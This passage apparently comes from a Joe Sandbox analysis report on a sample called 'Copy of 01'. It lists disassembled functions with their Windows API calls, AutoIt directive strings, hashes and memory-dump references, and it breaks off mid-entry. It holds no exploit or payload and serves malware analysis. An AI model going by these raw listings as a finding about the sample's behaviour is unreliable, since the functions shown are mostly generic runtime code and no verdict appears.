                        • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                        • String ID: .dll$.exe$.icl
                        • API String ID: 799131459-1154884017
                        • Opcode ID: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                        • Instruction ID: dbf1df8364cc47aaf3a4433a38a89b3db209f552023ece8fd9f1ca7503793675
                        • Opcode Fuzzy Hash: 1186b7de7a8355f07e742aa3b1bdd89cc28f8d98754c2b4d16bfe0ce78a4ca9d
                        • Instruction Fuzzy Hash: E661DF71500219BAEB1ADF65CC81FBE77ACBB05B11F10460AF915DA0D1DBB4AE90CBA0
                        Function 00337778 Relevance: 28.3, APIs: 1, Strings: 15, Instructions: 273COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID:
                        • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                        • API String ID: 0-1645009161
                        • Opcode ID: 065679f7e1244bd29674624441765974dbadef7e2620adbef24e8ef5999a3f20
                        • Instruction ID: 33e84e0f95355229927dca2fb428bd8f31c398fae41fb9122931e4e88fdf4af3
                        • Opcode Fuzzy Hash: 065679f7e1244bd29674624441765974dbadef7e2620adbef24e8ef5999a3f20
                        • Instruction Fuzzy Hash: FA81E5B1A04605BBDB37AF60CC83FBE77A8AF15301F058025F909AE192EBB5D945C791
                        Function 00395A1B Relevance: 27.2, APIs: 18, Instructions: 198windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • LoadIconW.USER32(00000063), ref: 00395A2E
                        • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00395A40
                        • SetWindowTextW.USER32(?,?), ref: 00395A57
                        • GetDlgItem.USER32(?,000003EA), ref: 00395A6C
                        • SetWindowTextW.USER32(00000000,?), ref: 00395A72
                        • GetDlgItem.USER32(?,000003E9), ref: 00395A82
                        • SetWindowTextW.USER32(00000000,?), ref: 00395A88
                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00395AA9
                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00395AC3
                        • GetWindowRect.USER32(?,?), ref: 00395ACC
                        • _wcslen.LIBCMT ref: 00395B33
                        • SetWindowTextW.USER32(?,?), ref: 00395B6F
                        • GetDesktopWindow.USER32 ref: 00395B75
                        • GetWindowRect.USER32(00000000), ref: 00395B7C
                        • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 00395BD3
                        • GetClientRect.USER32(?,?), ref: 00395BE0
                        • PostMessageW.USER32(?,00000005,00000000,?), ref: 00395C05
                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00395C2F
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                        • String ID:
                        • API String ID: 895679908-0
                        • Opcode ID: f89c70822905873ccd8d2efd8f26344a064b5b7b044f32abbe24a23b6e0bc86e
                        • Instruction ID: 9d155fa364839b97715f5940dc23709533ce2c72d559c11c906c59d1bfcf24d3
                        • Opcode Fuzzy Hash: f89c70822905873ccd8d2efd8f26344a064b5b7b044f32abbe24a23b6e0bc86e
                        • Instruction Fuzzy Hash: E7716C31900B09AFDF22DFA8CE85E6EBBF9FF48704F104518E586A65A0D775A990CB50
                        Function 003930F7 Relevance: 26.6, APIs: 8, Strings: 7, Instructions: 400COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen
                        • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[?
                        • API String ID: 176396367-1448639043
                        • Opcode ID: 177f9012f259230eaef32e03a4e049040d473e58597badfbf6ba2b8fdd91261e
                        • Instruction ID: a555c3974ee41f83575249f658547f4227308302b012e0a1f58f26fc0f89f15f
                        • Opcode Fuzzy Hash: 177f9012f259230eaef32e03a4e049040d473e58597badfbf6ba2b8fdd91261e
                        • Instruction Fuzzy Hash: 25E1E572A00516ABCF1B9FA8C481BFEFBB4BF44710F568119E556FB250DB30AE858790
                        Function 003500C6 Relevance: 26.3, APIs: 10, Strings: 5, Instructions: 81COMMON
                        Download Yara Rule
                        APIs
                        • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 003500C6
                          • Part of subcall function 003500ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0040070C,00000FA0,2F3428F3,?,?,?,?,003723B3,000000FF), ref: 0035011C
                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,003723B3,000000FF), ref: 00350127
                          • Part of subcall function 003500ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,003723B3,000000FF), ref: 00350138
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0035014E
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0035015C
                          • Part of subcall function 003500ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0035016A
                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00350195
                          • Part of subcall function 003500ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 003501A0
                        • ___scrt_fastfail.LIBCMT ref: 003500E7
                          • Part of subcall function 003500A3: __onexit.LIBCMT ref: 003500A9
                        Strings
                        • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00350122
                        • kernel32.dll, xrefs: 00350133
                        • WakeAllConditionVariable, xrefs: 00350162
                        • InitializeConditionVariable, xrefs: 00350148
                        • SleepConditionVariableCS, xrefs: 00350154
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                        • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                        • API String ID: 66158676-1714406822
                        • Opcode ID: d2bdadc748447ed92e835bba67dba1c6cb7131944385cbb1b335c974ab02eb2e
                        • Instruction ID: f7d25b1379f92bbe78ead8d11d2a6f82e8f3e6be4527bf8ad27d93b8e7e19d91
                        • Opcode Fuzzy Hash: d2bdadc748447ed92e835bba67dba1c6cb7131944385cbb1b335c974ab02eb2e
                        • Instruction Fuzzy Hash: C62129366407006FE7176B64AC0AF6A73D8DB04B52F05013AFC05E72E1DF75AC048B95
                        Function 003A44C0 Relevance: 24.8, APIs: 7, Strings: 7, Instructions: 309COMMON
                        Download Yara Rule
                        APIs
                        • CharLowerBuffW.USER32(00000000,00000000,003CCC08), ref: 003A4527
                        • _wcslen.LIBCMT ref: 003A453B
                        • _wcslen.LIBCMT ref: 003A4599
                        • _wcslen.LIBCMT ref: 003A45F4
                        • _wcslen.LIBCMT ref: 003A463F
                        • _wcslen.LIBCMT ref: 003A46A7
                          • Part of subcall function 0034F9F2: _wcslen.LIBCMT ref: 0034F9FD
                        • GetDriveTypeW.KERNEL32(?,003F6BF0,00000061), ref: 003A4743
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: _wcslen$BuffCharDriveLowerType
                        • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                        • API String ID: 2055661098-1000479233
                        • Opcode ID: 8c7c612ad472570d836c1a929963307f481245e4fe2cdb9d5da436be480df8e7
                        • Instruction ID: d20f191a2182f97e402e432ce5054bc56b0a8e9140cd04428b6d3984406a1b0a
                        • Opcode Fuzzy Hash: 8c7c612ad472570d836c1a929963307f481245e4fe2cdb9d5da436be480df8e7
                        • Instruction Fuzzy Hash: 61B1EF316083029FC716DF28C891A6AB7E5EFE7720F51491DF496CB2A1E7B1D844CB92
                        Function 003C911E Relevance: 24.7, APIs: 10, Strings: 4, Instructions: 181windowfileCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00349BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00349BB2
                        • DragQueryPoint.SHELL32(?,?), ref: 003C9147
                          • Part of subcall function 003C7674: ClientToScreen.USER32(?,?), ref: 003C769A
                          • Part of subcall function 003C7674: GetWindowRect.USER32(?,?), ref: 003C7710
                          • Part of subcall function 003C7674: PtInRect.USER32(?,?,003C8B89), ref: 003C7720
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C91B0
                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 003C91BB
                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 003C91DE
                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 003C9225
                        • SendMessageW.USER32(?,000000B0,?,?), ref: 003C923E
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9255
                        • SendMessageW.USER32(?,000000B1,?,?), ref: 003C9277
                        • DragFinish.SHELL32(?), ref: 003C927E
                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 003C9371
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#@
                        • API String ID: 221274066-110456269
                        • Opcode ID: 32ff6184d0ded994427a584d460225cb3c12cbc23ea0ce1299fda2f055b18252
                        • Instruction ID: 30d93a0a6c1d8c0b9b7961b2b1be459276aceaeb193245c306838f8668ef1494
                        • Opcode Fuzzy Hash: 32ff6184d0ded994427a584d460225cb3c12cbc23ea0ce1299fda2f055b18252
                        • Instruction Fuzzy Hash: 76618D71108305AFC702DF64DD89EAFBBE8EF88750F00492EF595971A0DB70AA49CB52
                        Function 003BAFF9 Relevance: 24.4, APIs: 16, Instructions: 418processCOMMON
                        Download Yara Rule
                        APIs
                        • _wcslen.LIBCMT ref: 003BB198
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1B0
                        • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 003BB1D4
                        • _wcslen.LIBCMT ref: 003BB200
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB214
                        • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 003BB236
                        • _wcslen.LIBCMT ref: 003BB332
                          • Part of subcall function 003A05A7: GetStdHandle.KERNEL32(000000F6), ref: 003A05C6
                        • _wcslen.LIBCMT ref: 003BB34B
                        • _wcslen.LIBCMT ref: 003BB366
                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BB3B6
                        • GetLastError.KERNEL32(00000000), ref: 003BB407
                        • CloseHandle.KERNEL32(?), ref: 003BB439
                        • CloseHandle.KERNEL32(00000000), ref: 003BB44A
                        • CloseHandle.KERNEL32(00000000), ref: 003BB45C
                        • CloseHandle.KERNEL32(00000000), ref: 003BB46E
                        • CloseHandle.KERNEL32(?), ref: 003BB4E3
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                        • String ID:
                        • API String ID: 2178637699-0
                        • Opcode ID: 1d55657bb90aea2db0396363699647be6e6d2d0d44cba3f3d300d35c4d656def
                        • Instruction ID: b2f0b13c42bae23d9d8f28f58a0f4f9fce3a4ce17b272bfb8beb92b7916097c5
                        • Opcode Fuzzy Hash: 1d55657bb90aea2db0396363699647be6e6d2d0d44cba3f3d300d35c4d656def
                        • Instruction Fuzzy Hash: 04F1AF315043009FC726EF24C891B6EBBE4AF85318F19895DF9999F2A2CB71EC44CB52
                        Function 0033326F Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 214windowCOMMON
                        Download Yara Rule
                        APIs
                        • GetMenuItemCount.USER32(00401990), ref: 00372F8D
                        • GetMenuItemCount.USER32(00401990), ref: 0037303D
                        • GetCursorPos.USER32(?), ref: 00373081
                        • SetForegroundWindow.USER32(00000000), ref: 0037308A
                        • TrackPopupMenuEx.USER32(00401990,00000000,?,00000000,00000000,00000000), ref: 0037309D
                        • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 003730A9
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                        • String ID: 0
                        • API String ID: 36266755-4108050209
                        • Opcode ID: 1b483645ffa181e9395c7477f93771f9fb1606d07949e2a498e4970384274b82
                        • Instruction ID: b575dc201b0a9176f2d6f136a9b6340a41a27d1118852640351e9e71f31d53e0
                        • Opcode Fuzzy Hash: 1b483645ffa181e9395c7477f93771f9fb1606d07949e2a498e4970384274b82
                        • Instruction Fuzzy Hash: 3F71E671644205BEEB338F25DC89FABBF68FF05364F208216F519AA1E0C7B5A910DB50
                        Function 003C6CD9 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 194windowCOMMON
                        Download Yara Rule
                        APIs
                        • DestroyWindow.USER32(?,?), ref: 003C6DEB
                          • Part of subcall function 00336B57: _wcslen.LIBCMT ref: 00336B6A
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 003C6E5F
                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 003C6E81
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6E94
                        • DestroyWindow.USER32(?), ref: 003C6EB5
                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00330000,00000000), ref: 003C6EE4
                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 003C6EFD
                        • GetDesktopWindow.USER32 ref: 003C6F16
                        • GetWindowRect.USER32(00000000), ref: 003C6F1D
                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 003C6F35
                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 003C6F4D
                          • Part of subcall function 00349944: GetWindowLongW.USER32(?,000000EB), ref: 00349952
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                        • String ID: 0$tooltips_class32
                        • API String ID: 2429346358-3619404913
                        • Opcode ID: b8a484f45dc8b0909883ab872700d9f666d1a5ff5fe8e38d81ff747b3057125c
                        • Instruction ID: b850a23b0fa6f4ad20362ede217385762b1bff5e92c01c5f539be380254f1753
                        • Opcode Fuzzy Hash: b8a484f45dc8b0909883ab872700d9f666d1a5ff5fe8e38d81ff747b3057125c
                        • Instruction Fuzzy Hash: 6D715574104244AFDB22DF28DD59FAABBE9EF89304F08442EF989D7261C770AD06DB15
                        Function 003AC476 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 143networkCOMMON
                        Download Yara Rule
                        APIs
                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 003AC4B0
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC4C3
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC4D7
                        • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 003AC4F0
                        • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 003AC533
                        • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 003AC549
                        • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 003AC554
                        • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 003AC584
                        • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 003AC5DC
                        • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 003AC5F0
                        • InternetCloseHandle.WININET(00000000), ref: 003AC5FB
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                        • String ID:
                        • API String ID: 3800310941-3916222277
                        • Opcode ID: a52d36612e1ca7d774226ce587fe01af40080d33ab892460f2e9cf1a11af7e68
                        • Instruction ID: ef53319b3283116355678a7b77bbe0bf56d54c63adae3c8ec743ee2e7f8fdba9
                        • Opcode Fuzzy Hash: a52d36612e1ca7d774226ce587fe01af40080d33ab892460f2e9cf1a11af7e68
                        • Instruction Fuzzy Hash: 99514BB1510204BFDB238F61C948EAA7BFCFF0A744F006519F949D6610DB35E944DB60
                        Function 003C856F Relevance: 22.6, APIs: 15, Instructions: 131filecommemoryCOMMON
                        Download Yara Rule
                        APIs
                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00000000,?,000000EC), ref: 003C8592
                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85A2
                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85AD
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85BA
                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85C8
                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85D7
                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E0
                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85E7
                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,000000F0,?,?,?,?,00000000,?,000000EC,?,000000F0), ref: 003C85F8
                        • OleLoadPicture.OLEAUT32(000000F0,00000000,00000000,003CFC38,?), ref: 003C8611
                        • GlobalFree.KERNEL32(00000000), ref: 003C8621
                        • GetObjectW.GDI32(?,00000018,?), ref: 003C8641
                        • CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 003C8671
                        • DeleteObject.GDI32(?), ref: 003C8699
                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 003C86AF
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                        • String ID:
                        • API String ID: 3840717409-0
                        • Opcode ID: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                        • Instruction ID: 97481e60935a43c1c16f7d23834e6ab07d61d21bb08d91a0730459e76b1e04d6
                        • Opcode Fuzzy Hash: a6d57486e6006a32aae337b1257b8d263bc6e84a536abd7ae929fb99f500cace
                        • Instruction Fuzzy Hash: 7A410C75610204AFDB129FA5DC48EAABBBCFF89711F154458F909E7260DB70AE01DB60
                        Function 003A14BD Relevance: 21.4, APIs: 10, Strings: 2, Instructions: 360timeCOMMON
                        Download Yara Rule
                        APIs
                        • VariantInit.OLEAUT32(00000000), ref: 003A1502
                        • VariantCopy.OLEAUT32(?,?), ref: 003A150B
                        • VariantClear.OLEAUT32(?), ref: 003A1517
                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 003A15FB
                        • VarR8FromDec.OLEAUT32(?,?), ref: 003A1657
                        • VariantInit.OLEAUT32(?), ref: 003A1708
                        • SysFreeString.OLEAUT32(?), ref: 003A178C
                        • VariantClear.OLEAUT32(?), ref: 003A17D8
                        • VariantClear.OLEAUT32(?), ref: 003A17E7
                        • VariantInit.OLEAUT32(00000000), ref: 003A1823
                        Strings
                        Memory Dump Source
                        • Source File: 00000000.00000002.2189465969.0000000000331000.00000020.00000001.01000000.00000003.sdmp, Offset: 00330000, based on PE: true
                        • Associated: 00000000.00000002.2189446817.0000000000330000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003CC000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189517822.00000000003F2000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189555355.00000000003FC000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.2189570479.0000000000404000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_330000_Copy of 01.jbxd
                        Similarity
                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                        • API String ID: 1234038744-3931177956
                        • Opcode ID: 8660d6649dff298f1666fe66ff2a51fca322f225876c81187382bb2a4f17c1db
                        • Instruction ID: ed5174aaf77762885d7e0af0d2bfa7797c1d105e32500908807435ffa9eed73a
                        • Opcode Fuzzy Hash: 8660d6649dff298f1666fe66ff2a51fca322f225876c81187382bb2a4f17c1db
                        • Instruction Fuzzy Hash: 26D10E32E00505EBDB02AFA5D895BB9B7B9FF47700F14805AE846AF580DB30EC41DBA1
                        Function 003BB60E Relevance: 21.3, APIs: 10, Strings: 2, Instructions: 285registrylibraryloaderCOMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00339CB3: _wcslen.LIBCMT ref: 00339CBD
